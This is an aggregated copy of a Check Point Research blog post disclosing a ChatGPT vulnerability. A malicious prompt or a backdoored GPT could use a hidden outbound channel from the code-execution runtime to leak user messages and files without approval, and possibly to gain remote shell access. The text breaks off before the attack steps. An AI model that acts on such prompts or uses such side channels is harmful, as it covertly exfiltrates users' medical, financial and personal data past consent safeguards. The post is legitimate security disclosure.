Mar 30, 2026 • alexeybu
ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime
Key Takeaways What Happened AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask...
Summary
Key Takeaways What Happened AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: […] The post ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime appeared first on Check Point Research .
Published Analysis
Key Takeaways What Happened AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: […] The post ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime appeared first on Check Point Research . Key Takeaways Sensitive data shared with ChatGPT conversations could be silently exfiltrated without the user’s knowledge or approval. Check Point Research discovered a hidden outbound communication path from ChatGPT’s isolated execution runtime to the public internet. A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content. A backdoored GPT could abuse the same weakness to obtain access to user data without the user’s awareness or consent. The same hidden communication path could also be used to establish remote shell access inside the Linux runtime used for code execution. What Happened AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: data shared in the conversation remains inside the system. ChatGPT itself presents outbound data sharing as something restricted, visible, and controlled. Potentially sensitive data is not supposed to be sent to arbitrary third parties simply because a prompt requests it. External actions are expected to be mediated through explicit safeguards, and direct outbound access from the code-execution environment is restricted. Figure 1 – ChatGPT presents outbound data leakage as restricted and safeguarded. Our research uncovered a path around that model. We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation. Video 1 – During a ChatGPT conversation, user content summary is silently transmitted to an external server without warning or approval. The Intended Safeguards ChatGPT includes useful tools that can retrieve information from the internet and execute Python code. At the same time, OpenAI has built safeguards around those capabilities to protect user data. For example, the web-search capability does not allow sensitive chat content to be transmitted outward through crafted query strings. The Python-based Data Analysis environment was designed to prevent internet access as well. OpenAI describes that environment as a secure code execution runtime that cannot generate direct outbound network requests . Figure 2 – Screenshot showing blocked outbound Internet attempt from inside the container. OpenAI also documents that so called GPTs can send relevant parts of a user’s input to external services through APIs. A GPT is a customized version of ChatGPT that can be configured with instructions, knowledge files, and external integrations. GPT “Actions” provide a legitimate way to call third-party APIs and exchange data with outside services. Actions are useful for enterprise workflows, access to internal business systems, customer support operations, and other integrations that connect ChatGPT to external services, including simpler use cases such as travel or weather lookups. The key point is visibility: the user sees that data is about to leave ChatGPT, sees where it is going, and decides whether to allow it. Figure 3 – GPT Action approval dialog showing the destination and the data that will be sent. In other words, legitimate outbound data flows are designed to happen through an explicit, user-facing approval process. From One Message to Silent Exfiltration From a security perspective, the obvious attack surfaces looked strong. The ability to send chat data through tools not designed for that purpose was strictly limited. Sending data through a legitimate GPT integration using external API calls also required explicit user confirmation. The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis. Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation. As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user’s perspective. At a high level, the attack began when the victim...